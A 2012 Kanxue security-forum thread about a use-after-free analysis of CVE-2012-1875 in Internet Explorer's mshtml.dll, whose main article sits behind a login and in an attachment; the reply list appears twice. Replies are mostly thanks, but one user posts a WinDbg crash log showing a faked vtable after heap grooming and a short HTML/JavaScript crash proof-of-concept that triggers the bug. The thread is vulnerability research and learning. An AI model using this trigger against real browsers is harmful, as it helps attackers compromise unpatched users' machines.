[原创]CVE-2012-1875:mshtml.dll Use-After-Free漏洞分析-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com

[原创]CVE-2012-1875:mshtml.dll Use-After-Free漏洞分析

发表于: 2012-6-17 23:13 10607

[原创]CVE-2012-1875:mshtml.dll Use-After-Free漏洞分析

cscoder

2012-6-17 23:13

10607

挖洞这种同时考验内功和人品的事儿，对我来说还是太强人所难，所以我只能捡点纯体力劳动干干，趁自己还年轻，有膀子力气
调试了一番外国友人提供的POC，写了一点自己的理解和大家分享。文中纰漏之处，恳请各位看官斧正

登录后可查看完整内容

[招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)

上传的附件：

CVE-2012-1875_MSHTML.DLL USE-AFTER-FREE漏洞分析.rar （111.26kb，553次下载）

收藏・8

免费・6

支持

最新回复 (19)
金罡雪币： 1489 活跃值： (1053) 能力值： ( LV8，RANK：130 ) 在线值：发帖 13 回帖 367 粉丝 108 关注私信	金罡 2 2 楼膜拜楼主的调试功底。 2012-6-18 11:03 0
miaoling 雪币： 94 活跃值： (25) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 146 粉丝 0 关注私信	miaoling 3 楼 mark，先顶后看 2012-6-18 12:03 0
riusksk 雪币： 433 活跃值： (1870) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 260 关注私信	riusksk 41 4 楼不错，下载学习下 2012-6-18 13:42 0
俊虎雪币： 217 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 133 粉丝 0 关注私信	俊虎 5 楼看看先，厉害的人还是蛮多的 2012-6-18 15:45 0
打狗棒雪币： 72 活跃值： (25) 能力值： ( LV3，RANK：20 ) 在线值：发帖 5 回帖 61 粉丝 0 关注私信	打狗棒 6 楼看作者的调试文档很给力，但是我重现场景不能触发呢？用文档中修改后的POC，貌似IE没加载mshtml模块啊？？ 2012-6-18 16:31 0
yiyiguxing 雪币： 70 活跃值： (74) 能力值： ( LV4，RANK：50 ) 在线值：发帖 33 回帖 257 粉丝 0 关注私信	yiyiguxing 1 7 楼 K.K的功力越来越深 2012-6-19 11:25 0
bitt 雪币： 435 活跃值： (1282) 能力值： ( LV13，RANK：388 ) 在线值：发帖 27 回帖 634 粉丝 18 关注私信	bitt 5 8 楼下载学习谢谢分享 2012-6-20 14:26 0
riusksk 雪币： 433 活跃值： (1870) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 260 关注私信	riusksk 41 9 楼 KK熟悉IE解析html的过程啊，求学习资料，各种函数调用这些，或者api文档，求科普 2012-6-20 23:38 0
baixinye 雪币： 78 活跃值： (85) 能力值： ( LV4，RANK：50 ) 在线值：发帖 2 回帖 56 粉丝 6 关注私信	baixinye 1 10 楼 IE 5 源码 + 符号 + IDA NAME搜索html各种关键字 + 各种推测 2012-6-23 13:39 0
hmonster 雪币： 180 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 23 粉丝 0 关注私信	hmonster 11 楼学习了，支持楼主 2012-6-23 18:57 0
riusksk 雪币： 433 活跃值： (1870) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 260 关注私信	riusksk 41 12 楼 thx................ 2012-6-23 19:07 0
黑恋雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	黑恋 13 楼感谢楼主分享。什么好东东啊？ 2012-6-25 15:34 0
天易love 雪币： 2015 活跃值： (902) 能力值： ( LV12，RANK：1000 ) 在线值：发帖 106 回帖 1059 粉丝 21 关注私信	天易love 18 14 楼 100台电脑有几台能测试成功啊？这个版本的dll还能找到吗？抽象贴 2012-6-25 15:40 0
bitt 雪币： 435 活跃值： (1282) 能力值： ( LV13，RANK：388 ) 在线值：发帖 27 回帖 634 粉丝 18 关注私信	bitt 5 15 楼不会吧 ie8很稳定重现啊风水也很好命中稳定访问异常就是伪造的 vtable 1c1c1c7c (720.c68): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=1c1c1c0c ebx=00000000 ecx=00321668 edx=00000001 esi=00321668 edi=0208b7c0 eip=68dbc402 esp=0208b758 ebp=0208b764 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 mshtml!CElement::Doc+0x2: 68dbc402 8b5070 mov edx,dword ptr [eax+70h] ds:0023:1c1c1c7c=???????? 0:005> uf mshtml!CElement::Doc mshtml!CElement::Doc: 68dbc400 8b01 mov eax,dword ptr [ecx] 68dbc402 8b5070 mov edx,dword ptr [eax+70h] 68dbc405 ffd2 call edx 68dbc407 8b400c mov eax,dword ptr [eax+0Ch] 68dbc40a c3 ret 2012-6-25 19:43 0
bitt 雪币： 435 活跃值： (1282) 能力值： ( LV13，RANK：388 ) 在线值：发帖 27 回帖 634 粉丝 18 关注私信	bitt 5 16 楼发个简化版 crash poc <DIV id=testfaild> <img id="imgTest"> <div id="imgTest"></div> <input id="4B5F5F4B" onMouseOver="crash();"></input> </DIV> <script language="JavaScript"> function crash() { eval("imgTest").src = ""; } function trigger() { var x =document.getElementsByTagName("input"); x[0].fireEvent("onMouseOver"); testfaild.innerHTML = testfaild.innerHTML; x[0].fireEvent("onMouseOver"); } trigger(); </script> 2012-6-25 19:48 0
天易love 雪币： 2015 活跃值： (902) 能力值： ( LV12，RANK：1000 ) 在线值：发帖 106 回帖 1059 粉丝 21 关注私信	天易love 18 17 楼请问楼上兄弟你的漏洞模块： mshtml.dll 8.0.6001.19222是在哪里找到的？谢谢我的IE8：上传的附件： ie8.png （28.16kb，91次下载） 2012-6-25 20:25 0
bitt 雪币： 435 活跃值： (1282) 能力值： ( LV13，RANK：388 ) 在线值：发帖 27 回帖 634 粉丝 18 关注私信	bitt 5 18 楼 [QUOTE=天易love;1082710]请问楼上兄弟你的漏洞模块： mshtml.dll 8.0.6001.19222是在哪里找到的？谢谢我的IE8： [/QUOTE] 你的ie版本和楼主的倒是一样我的ie是for win7的所以版本号是8.0.7600.16385 按说这是个新漏洞只要近期没升级的低一点的版本应该都很难幸免可以windbg附加跑看看有没有什么异常 2012-6-25 21:42 0
AntBean 雪币： 611 活跃值： (251) 能力值： ( LV12，RANK：390 ) 在线值：发帖 34 回帖 139 粉丝 4 关注私信	AntBean 9 19 楼我的ie 8 + window xp sp3 en 没重现出来，头大。。。 2012-6-26 16:55 0
善良屠夫雪币： 201 活跃值： (16) 能力值： ( LV2，RANK：10 ) 在线值：发帖 20 回帖 159 粉丝 0 关注私信	善良屠夫 20 楼先顶一个再学习 2012-7-1 13:23 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

cscoder

发帖

回帖

230

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (19)
金罡雪币： 1489 活跃值： (1053) 能力值： ( LV8，RANK：130 ) 在线值：发帖 13 回帖 367 粉丝 108 关注私信	金罡 2 2 楼膜拜楼主的调试功底。 2012-6-18 11:03 0
miaoling 雪币： 94 活跃值： (25) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 146 粉丝 0 关注私信	miaoling 3 楼 mark，先顶后看 2012-6-18 12:03 0
riusksk 雪币： 433 活跃值： (1870) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 260 关注私信	riusksk 41 4 楼不错，下载学习下 2012-6-18 13:42 0
俊虎雪币： 217 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 133 粉丝 0 关注私信	俊虎 5 楼看看先，厉害的人还是蛮多的 2012-6-18 15:45 0
打狗棒雪币： 72 活跃值： (25) 能力值： ( LV3，RANK：20 ) 在线值：发帖 5 回帖 61 粉丝 0 关注私信	打狗棒 6 楼看作者的调试文档很给力，但是我重现场景不能触发呢？用文档中修改后的POC，貌似IE没加载mshtml模块啊？？ 2012-6-18 16:31 0
yiyiguxing 雪币： 70 活跃值： (74) 能力值： ( LV4，RANK：50 ) 在线值：发帖 33 回帖 257 粉丝 0 关注私信	yiyiguxing 1 7 楼 K.K的功力越来越深 2012-6-19 11:25 0
bitt 雪币： 435 活跃值： (1282) 能力值： ( LV13，RANK：388 ) 在线值：发帖 27 回帖 634 粉丝 18 关注私信	bitt 5 8 楼下载学习谢谢分享 2012-6-20 14:26 0
riusksk 雪币： 433 活跃值： (1870) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 260 关注私信	riusksk 41 9 楼 KK熟悉IE解析html的过程啊，求学习资料，各种函数调用这些，或者api文档，求科普 2012-6-20 23:38 0
baixinye 雪币： 78 活跃值： (85) 能力值： ( LV4，RANK：50 ) 在线值：发帖 2 回帖 56 粉丝 6 关注私信	baixinye 1 10 楼 IE 5 源码 + 符号 + IDA NAME搜索html各种关键字 + 各种推测 2012-6-23 13:39 0
hmonster 雪币： 180 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 23 粉丝 0 关注私信	hmonster 11 楼学习了，支持楼主 2012-6-23 18:57 0
riusksk 雪币： 433 活跃值： (1870) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 260 关注私信	riusksk 41 12 楼 thx................ 2012-6-23 19:07 0
黑恋雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	黑恋 13 楼感谢楼主分享。什么好东东啊？ 2012-6-25 15:34 0
天易love 雪币： 2015 活跃值： (902) 能力值： ( LV12，RANK：1000 ) 在线值：发帖 106 回帖 1059 粉丝 21 关注私信	天易love 18 14 楼 100台电脑有几台能测试成功啊？这个版本的dll还能找到吗？抽象贴 2012-6-25 15:40 0
bitt 雪币： 435 活跃值： (1282) 能力值： ( LV13，RANK：388 ) 在线值：发帖 27 回帖 634 粉丝 18 关注私信	bitt 5 15 楼不会吧 ie8很稳定重现啊风水也很好命中稳定访问异常就是伪造的 vtable 1c1c1c7c (720.c68): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=1c1c1c0c ebx=00000000 ecx=00321668 edx=00000001 esi=00321668 edi=0208b7c0 eip=68dbc402 esp=0208b758 ebp=0208b764 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 mshtml!CElement::Doc+0x2: 68dbc402 8b5070 mov edx,dword ptr [eax+70h] ds:0023:1c1c1c7c=???????? 0:005> uf mshtml!CElement::Doc mshtml!CElement::Doc: 68dbc400 8b01 mov eax,dword ptr [ecx] 68dbc402 8b5070 mov edx,dword ptr [eax+70h] 68dbc405 ffd2 call edx 68dbc407 8b400c mov eax,dword ptr [eax+0Ch] 68dbc40a c3 ret 2012-6-25 19:43 0
bitt 雪币： 435 活跃值： (1282) 能力值： ( LV13，RANK：388 ) 在线值：发帖 27 回帖 634 粉丝 18 关注私信	bitt 5 16 楼发个简化版 crash poc <DIV id=testfaild> <img id="imgTest"> <div id="imgTest"></div> <input id="4B5F5F4B" onMouseOver="crash();"></input> </DIV> <script language="JavaScript"> function crash() { eval("imgTest").src = ""; } function trigger() { var x =document.getElementsByTagName("input"); x[0].fireEvent("onMouseOver"); testfaild.innerHTML = testfaild.innerHTML; x[0].fireEvent("onMouseOver"); } trigger(); </script> 2012-6-25 19:48 0
天易love 雪币： 2015 活跃值： (902) 能力值： ( LV12，RANK：1000 ) 在线值：发帖 106 回帖 1059 粉丝 21 关注私信	天易love 18 17 楼请问楼上兄弟你的漏洞模块： mshtml.dll 8.0.6001.19222是在哪里找到的？谢谢我的IE8：上传的附件： ie8.png （28.16kb，91次下载） 2012-6-25 20:25 0
bitt 雪币： 435 活跃值： (1282) 能力值： ( LV13，RANK：388 ) 在线值：发帖 27 回帖 634 粉丝 18 关注私信	bitt 5 18 楼 [QUOTE=天易love;1082710]请问楼上兄弟你的漏洞模块： mshtml.dll 8.0.6001.19222是在哪里找到的？谢谢我的IE8： [/QUOTE] 你的ie版本和楼主的倒是一样我的ie是for win7的所以版本号是8.0.7600.16385 按说这是个新漏洞只要近期没升级的低一点的版本应该都很难幸免可以windbg附加跑看看有没有什么异常 2012-6-25 21:42 0
AntBean 雪币： 611 活跃值： (251) 能力值： ( LV12，RANK：390 ) 在线值：发帖 34 回帖 139 粉丝 4 关注私信	AntBean 9 19 楼我的ie 8 + window xp sp3 en 没重现出来，头大。。。 2012-6-26 16:55 0
善良屠夫雪币： 201 活跃值： (16) 能力值： ( LV2，RANK：10 ) 在线值：发帖 20 回帖 159 粉丝 0 关注私信	善良屠夫 20 楼先顶一个再学习 2012-7-1 13:23 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复